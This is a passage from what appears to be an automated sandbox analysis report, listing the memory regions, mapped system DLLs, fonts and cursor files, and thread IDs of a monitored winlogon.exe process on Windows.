= 0x870000 end_va = 0x872fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 38742 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 38767 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Thread: id = 1037 os_tid = 0x170 Thread: id = 1038 os_tid = 0x174 Thread: id = 1039 os_tid = 0x178 Thread: id = 1040 os_tid = 0x17c Thread: id = 1041 os_tid = 0x180 Thread: id = 1046 os_tid = 0x19c Thread: id = 1052 os_tid = 0x1b0 Thread: id = 1055 os_tid = 0x1bc Process: id = "666" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x7f1d10c0" os_pid = "0x184" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "663" os_parent_pid = "0x158" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36641 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36642 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 36643 start_va = 0x8a0000 end_va = 0x8e7fff entry_point = 0x8a0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 36644 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36645 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36646 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36647 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36648 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36649 start_va = 0x1b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 36650 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36651 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36652 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36653 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36654 start_va = 0x20000 end_va = 0x86fff entry_point = 0x20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36655 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36656 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36657 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36658 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36659 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36660 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 36661 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36662 start_va = 0x90000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 36663 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36664 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36665 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 36666 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 36667 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36668 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36669 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36670 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 36671 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 36672 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 36673 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 36674 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36675 start_va = 0x8f0000 end_va = 0xce2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 36676 start_va = 0x4d0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36677 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 36678 start_va = 0x6f0000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 36679 start_va = 0xcf0000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 36680 start_va = 0x4d0000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36681 start_va = 0x5b0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 36682 start_va = 0x6f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 36683 start_va = 0x830000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 36684 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 36685 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36686 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36687 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 36688 start_va = 0x6b0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 36689 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36690 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36691 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 36692 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36730 start_va = 0x75bf0000 end_va = 0x75bf3fff entry_point = 0x75bf0000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 36731 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36732 start_va = 0xe70000 end_va = 0x1df2fff entry_point = 0xe70000 region_type = mapped_file name = "batang.ttc" filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc") Region: id = 36733 start_va = 0xe70000 end_va = 0x1b55fff entry_point = 0xe70000 region_type = mapped_file name = "gulim.ttc" filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc") Region: id = 36734 start_va = 0xe70000 end_va = 0x1292fff entry_point = 0xe70000 region_type = mapped_file name = "malgun.ttf" filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf") Region: id = 36735 start_va = 0xe70000 end_va = 0x12befff entry_point = 0xe70000 region_type = mapped_file name = "malgunbd.ttf" filename = "\\Windows\\Fonts\\malgunbd.ttf" (normalized: "c:\\windows\\fonts\\malgunbd.ttf") Region: id = 36736 start_va = 0xe70000 end_va = 0x1787fff entry_point = 0xe70000 region_type = mapped_file name = "meiryo.ttc" filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc") Region: id = 36737 start_va = 0xe70000 end_va = 0x17bcfff entry_point = 0xe70000 region_type = mapped_file name = "meiryob.ttc" filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc") Region: id = 36738 start_va = 0xe70000 end_va = 0x2318fff entry_point = 0xe70000 region_type = mapped_file name = "msjh.ttf" filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf") Region: id = 36739 start_va = 0xe70000 end_va = 0x1c46fff entry_point = 0xe70000 region_type = mapped_file name = "msjhbd.ttf" filename = "\\Windows\\Fonts\\msjhbd.ttf" (normalized: "c:\\windows\\fonts\\msjhbd.ttf") Region: id = 36740 start_va = 0xe70000 end_va = 0x2332fff entry_point = 0xe70000 region_type = mapped_file name = "msyh.ttf" filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf") Region: id = 36741 start_va = 0xe70000 end_va = 0x1c5dfff entry_point = 0xe70000 region_type = mapped_file name = "msyhbd.ttf" filename = "\\Windows\\Fonts\\msyhbd.ttf" (normalized: "c:\\windows\\fonts\\msyhbd.ttf") Region: id = 36742 start_va = 0xe70000 end_va = 0x2d29fff entry_point = 0xe70000 region_type = mapped_file name = "mingliu.ttc" filename = "\\Windows\\Fonts\\mingliu.ttc" (normalized: "c:\\windows\\fonts\\mingliu.ttc") Region: id = 36743 start_va = 0xe70000 end_va = 0x2eadfff entry_point = 0xe70000 region_type = mapped_file name = "mingliub.ttc" filename = "\\Windows\\Fonts\\mingliub.ttc" (normalized: "c:\\windows\\fonts\\mingliub.ttc") Region: id = 36744 start_va = 0xe70000 end_va = 0x1730fff entry_point = 0xe70000 region_type = mapped_file name = "msgothic.ttc" filename = "\\Windows\\Fonts\\msgothic.ttc" (normalized: "c:\\windows\\fonts\\msgothic.ttc") Region: id = 36745 start_va = 0xe70000 end_va = 0x1807fff entry_point = 0xe70000 region_type = mapped_file name = "msmincho.ttc" filename = "\\Windows\\Fonts\\msmincho.ttc" (normalized: "c:\\windows\\fonts\\msmincho.ttc") Region: id = 36746 start_va = 0x6f0000 end_va = 0x76efff entry_point = 0x6f0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 36747 start_va = 0x7f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 36748 start_va = 0x6f0000 end_va = 0x769fff entry_point = 0x6f0000 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 36749 start_va = 0xe70000 end_va = 0x1d0dfff entry_point = 0xe70000 region_type = mapped_file name = "simsun.ttc" filename = "\\Windows\\Fonts\\simsun.ttc" (normalized: "c:\\windows\\fonts\\simsun.ttc") Region: id = 36750 start_va = 0xe70000 end_va = 0x1d21fff entry_point = 0xe70000 region_type = mapped_file name = "simsunb.ttf" filename = "\\Windows\\Fonts\\simsunb.ttf" (normalized: "c:\\windows\\fonts\\simsunb.ttf") Region: id = 36751 start_va = 0x6f0000 end_va = 0x79afff entry_point = 0x6f0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 36752 start_va = 0x6f0000 end_va = 0x78ffff entry_point = 0x6f0000 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 36831 start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 36832 start_va = 0x120000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 36833 start_va = 0x75b90000 end_va = 0x75b93fff entry_point = 0x75b90000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 36834 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 36835 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 36836 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_arrow.cur" filename = "\\Windows\\Cursors\\aero_arrow.cur" (normalized: "c:\\windows\\cursors\\aero_arrow.cur") Region: id = 36837 start_va = 0x8f0000 end_va = 0xce2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 36838 start_va = 0x280000 end_va = 0x2bdfff entry_point = 0x280000 region_type = mapped_file name = "aero_busy.ani" filename = "\\Windows\\Cursors\\aero_busy.ani" (normalized: "c:\\windows\\cursors\\aero_busy.ani") Region: id = 36839 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_up.cur" filename = "\\Windows\\Cursors\\aero_up.cur" (normalized: "c:\\windows\\cursors\\aero_up.cur") Region: id = 36840 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_nwse.cur" filename = "\\Windows\\Cursors\\aero_nwse.cur" (normalized: "c:\\windows\\cursors\\aero_nwse.cur") Region: id = 36841 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_nesw.cur" filename = "\\Windows\\Cursors\\aero_nesw.cur" (normalized: "c:\\windows\\cursors\\aero_nesw.cur") Region: id = 36842 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_ew.cur" filename = "\\Windows\\Cursors\\aero_ew.cur" (normalized: "c:\\windows\\cursors\\aero_ew.cur") Region: id = 36843 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_ns.cur" filename = "\\Windows\\Cursors\\aero_ns.cur" (normalized: "c:\\windows\\cursors\\aero_ns.cur") Region: id = 36844 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_move.cur" filename = "\\Windows\\Cursors\\aero_move.cur" (normalized: "c:\\windows\\cursors\\aero_move.cur") Region: id = 36845 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_unavail.cur" filename = "\\Windows\\Cursors\\aero_unavail.cur" (normalized: "c:\\windows\\cursors\\aero_unavail.cur") Region: id = 36846 start_va = 0x280000 end_va = 0x2bdfff entry_point = 0x280000 region_type = mapped_file name = "aero_working.ani" filename = "\\Windows\\Cursors\\aero_working.ani" (normalized: "c:\\windows\\cursors\\aero_working.ani") Region: id = 36847 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_helpsel.cur" filename = "\\Windows\\Cursors\\aero_helpsel.cur" (normalized: "c:\\windows\\cursors\\aero_helpsel.cur") Region: id = 36848 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_pen.cur" filename = "\\Windows\\Cursors\\aero_pen.cur" (normalized: "c:\\windows\\cursors\\aero_pen.cur") Region: id = 36849 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0xd0000 region_type = mapped_file name = "aero_link.cur" filename = "\\Windows\\Cursors\\aero_link.cur" (normalized: "c:\\windows\\cursors\\aero_link.cur") Region: id = 37455 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 37456 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37767 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 37768 start_va = 0xd60000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 37769 start_va = 0xe30000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 37770 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 38178 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 38183 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 38184 start_va = 0x73f30000 end_va = 0x73f37fff entry_point = 0x73f30000 region_type = mapped_file name = "uxinit.dll" filename = "\\Windows\\System32\\UXInit.dll" (normalized: "c:\\windows\\system32\\uxinit.dll") Region: id = 38198 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38199 start_va = 0xe70000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 38200 start_va = 0x1040000 end_va = 0x130efff entry_point = 0x1040000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38201 start_va = 0xe70000 end_va = 0xf8dfff entry_point = 0xe70000 region_type = mapped_file name = "aero.msstyles" filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles") Region: id = 38202 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 38203 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38204 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38205 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38206 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38207 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38208 start_va = 0x280000 end_va = 0x2bbfff entry_point = 0x280000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38209 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38210 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 38211 start_va = 0x1310000 end_va = 0x142dfff entry_point = 0x1310000 region_type = mapped_file name = "aero.msstyles" filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles") Region: id = 38212 start_va = 0x1310000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 38213 start_va = 0x74620000 end_va = 0x7471afff entry_point = 0x74620000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 38214 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38215 start_va = 0x1d10000 end_va = 0x1e12fff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 38216 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 38217 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 38218 start_va = 0x1d10000 end_va = 0x270ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 38219 start_va = 0x2710000 end_va = 0x280ffff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 38227 start_va = 0xe70000 end_va = 0xf4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 38230 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 38231 start_va = 0x1310000 end_va = 0x1f0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001310000" filename = "" Region: id = 38392 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 38393 start_va = 0x744e0000 end_va = 0x744eefff entry_point = 0x744e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 38394 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38402 start_va = 0x75810000 end_va = 0x7583afff entry_point = 0x75810000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 38403 start_va = 0x744f0000 end_va = 0x744f8fff entry_point = 0x744f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 38409 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38410 start_va = 0x730000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 38411 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 38416 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 38420 start_va = 0x4d0000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 38421 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 38422 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 38423 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 38424 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38430 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38518 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38519 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38523 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38527 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 38530 start_va = 0x72a90000 end_va = 0x72a93fff entry_point = 0x72a90000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 38531 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 38532 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 38533 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_arrow.cur" filename = "\\Windows\\Cursors\\aero_arrow.cur" (normalized: "c:\\windows\\cursors\\aero_arrow.cur") Region: id = 38534 start_va = 0x8f0000 end_va = 0xce2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 38535 start_va = 0x5f0000 end_va = 0x62dfff entry_point = 0x5f0000 region_type = mapped_file name = "aero_busy.ani" filename = "\\Windows\\Cursors\\aero_busy.ani" (normalized: "c:\\windows\\cursors\\aero_busy.ani") Region: id = 38536 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "aero_up.cur" filename = "\\Windows\\Cursors\\aero_up.cur" (normalized: "c:\\windows\\cursors\\aero_up.cur") Region: id = 38537 start_va = 0x280000 end_va = 0x283fff 